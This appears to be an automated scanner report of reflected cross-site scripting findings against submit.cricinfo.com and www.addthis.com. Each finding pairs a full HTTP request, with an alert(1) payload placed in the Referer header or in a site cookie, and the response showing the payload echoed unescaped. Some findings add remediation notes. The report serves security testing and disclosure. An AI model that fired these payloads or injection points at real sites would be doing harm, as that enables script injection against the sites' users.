HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:42 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 1324 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f392d"><script>alert(1)</script>00c65ad03a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:14:52 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148354 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:52 ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=f392d"><script>alert(1)</script>00c65ad03a2"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86d5"><script>alert(1)</script>3da25da6da3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us; Referer: http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:19:20 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148472 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:19:20 ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=c86d5"><script>alert(1)</script>3da25da6da3"> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload fb9a1<script>alert(1)</script>3a2ab225915 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fb9a1<script>alert(1)</script>3a2ab225915
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:30:22 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 87026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>fb9a1<script>alert(1)</script>3a2ab225915 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b78f"><script>alert(1)</script>25b9e7b34ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 17:30:21 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 87040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=7b78f"><script>alert(1)</script>25b9e7b34ca" /> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4754'-alert(1)-'d4807eabfe9 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaf4754'-alert(1)-'d4807eabfe9; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:39 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148414 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaf4754'-alert(1)-'d4807eabfe9, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usaf4754'-alert(1)-'d4807eabfe9;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 2f0e1--><script>alert(1)</script>28479a8797f was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa2f0e1--><script>alert(1)</script>28479a8797f; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:43 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148494 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa2f0e1--><script>alert(1)</script>28479a8797f, created: 2010-11-07 03:12:43 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb23"><script>alert(1)</script>73ebe8053a2 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usabbb23"><script>alert(1)</script>73ebe8053a2; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:35 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148489 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usabbb23"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usabbb23"><script>alert(1)</script>73ebe8053a2;kvpt=index;kvsite=global;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96c17'-alert(1)-'4cef5e4a3c8 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us96c17'-alert(1)-'4cef5e4a3c8;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:25 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148330 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us96c17'-alert(1)-'4cef5e4a3c8, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload e70d8--><script>alert(1)</script>9c7a9f58fdc was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=use70d8--><script>alert(1)</script>9c7a9f58fdc;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:28 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148362 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: use70d8--><script>alert(1)</script>9c7a9f58fdc, cluster: usa, created: 2010-11-07 03:13:28 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d00"><script>alert(1)</script>f3bf3b3642a was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:29 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 83786 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaa8d00"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaa8d00"><script>alert(1)</script>f3bf3b3642a;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 41993--><script>alert(1)</script>107db245a11 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa41993--><script>alert(1)</script>107db245a11; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:36 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 83803 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa41993--><script>alert(1)</script>107db245a11, created: 2010-11-07 03:12:36 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9904d'-alert(1)-'218689b8227 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa9904d'-alert(1)-'218689b8227; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:33 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 83531 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa9904d'-alert(1)-'218689b8227, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usa9904d'-alert(1)-'218689b8227;kvpt=index;kvsite=global;kvbrand=ci;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload b19ab--><script>alert(1)</script>f7e4260af65 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=usb19ab--><script>alert(1)</script>f7e4260af65;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:12 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 82907 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: usb19ab--><script>alert(1)</script>f7e4260af65, cluster: usa, created: 2010-11-07 03:13:12 --> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69125'-alert(1)-'2c7a734ccab was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ci/content/submit/poll/cast_vote.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us69125'-alert(1)-'2c7a734ccab;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:13:09 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 82875 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us69125'-alert(1)-'2c7a734ccab, cluster: usa, ...[SNIP]... <script language="javascript" type="text/javascript"> ord=Math.random()*10000000000000000;
The value of the Q_cricinfo_cluster cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3dc2"><script>alert(1)</script>9960f224455 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usaf3dc2"><script>alert(1)</script>9960f224455; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:02 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148607 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usaf3dc2"><script>alert(1)</scrip ...[SNIP]... <a href="http://ad.vulnerable.ad.partner/jump/espncricinfo_global/global;kvcluster=usaf3dc2"><script>alert(1)</script>9960f224455;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=123456789?" target="_blank"> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into an HTML comment. The payload 8b612--><script>alert(1)</script>1e44d058545 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa8b612--><script>alert(1)</script>1e44d058545; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:11 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148612 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa8b612--><script>alert(1)</script>1e44d058545, created: 2010-11-07 03:17:11 --> ...[SNIP]...
The value of the Q_cricinfo_cluster cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37c2'-alert(1)-'56441d147b1 was submitted in the Q_cricinfo_cluster cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usae37c2'-alert(1)-'56441d147b1; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:07 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148532 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usae37c2'-alert(1)-'56441d147b1, ...[SNIP]... <script language="JavaScript" src="http://ad.doubleclick.net/adj/espncricinfo_global/global;kvcluster=usae37c2'-alert(1)-'56441d147b1;kvpt=index;kvsite=cricinfomembermanagementservice;kvbrand=member_mgmt;tile=1;sz=728x90;ord=' + ord + '?" type="text/javascript"> ...[SNIP]...
The value of the Q_cricinfo_country cookie is copied into an HTML comment. The payload 6c213--><script>alert(1)</script>88efb11a633 was submitted in the Q_cricinfo_country cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us6c213--><script>alert(1)</script>88efb11a633;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:56 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148480 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us6c213--><script>alert(1)</script>88efb11a633, cluster: usa, created: 2010-11-07 03:17:56 --> ...[SNIP]...
